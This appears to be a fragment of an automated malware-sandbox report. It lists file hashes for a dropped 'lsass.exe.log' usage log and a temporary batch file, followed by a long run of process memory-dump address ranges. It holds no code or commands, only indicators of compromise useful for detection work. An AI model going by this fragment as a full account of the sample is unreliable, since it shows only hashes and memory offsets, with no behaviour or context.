C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\lsass.exe.log

MD5 24cfd42a8de70b38ed70e1f8cf4eda1c
SHA1 e447168fd38da9175084b36a06c3e9bbde99064c
SHA256 93b740416114e346878801c73e8a8670ff1390d3fa009424b88fafe614a3c5cd
SHA512 5c2daf5328ba99d750e9d0362e84f3a79b7fc8395aa8aa2bc1a01b266583fe1f8352bf0619f985aa72223412d14afa054537739b4941610a1d0f96e7fee2a875

memory/4560-291-0x0000000000910000-0x0000000000D30000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp1CFE.tmp.bat

MD5 aba27fbccbda6d26e5687cef36e16231
SHA1 6ebc699266d8d6db5c9956ed31945645b0d96eb8
SHA256 65667520a92d4ac875561686952ed2d6b70f0506ec6d1417b61656095feaa13d
SHA512 cb44e417e9bc6857ef9faaa0d43e61d837fe521bb150de3dbac609fb51f9f110c3cb9fda14079eb6cdbf5e6c1066f7d7fb104b9d30a4b8a767e587bb48a74c99

memory/4560-292-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-295-0x0000022BF16F0000-0x0000022BF1710000-memory.dmp

memory/1584-296-0x00007FF707870000-0x00007FF70823A000-memory.dmp

memory/4560-297-0x0000000006AA0000-0x0000000006AAA000-memory.dmp

memory/3304-298-0x0000022BF1770000-0x0000022BF17B0000-memory.dmp

memory/1224-300-0x00007FF66C580000-0x00007FF66C5A9000-memory.dmp

memory/4560-301-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-302-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/4560-303-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/1224-305-0x00007FF66C580000-0x00007FF66C5A9000-memory.dmp

memory/4560-306-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-307-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/4560-310-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-311-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/3304-312-0x0000022BF17C0000-0x0000022BF17E0000-memory.dmp

memory/4560-315-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-316-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/3304-317-0x0000022BF17C0000-0x0000022BF17E0000-memory.dmp

memory/4560-320-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-321-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/4560-324-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-325-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/4560-328-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-329-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/4560-332-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-333-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/4560-336-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-337-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/4560-340-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-341-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp

memory/4560-344-0x0000000000910000-0x0000000000D30000-memory.dmp

memory/3304-345-0x00007FF6083A0000-0x00007FF608B8F000-memory.dmp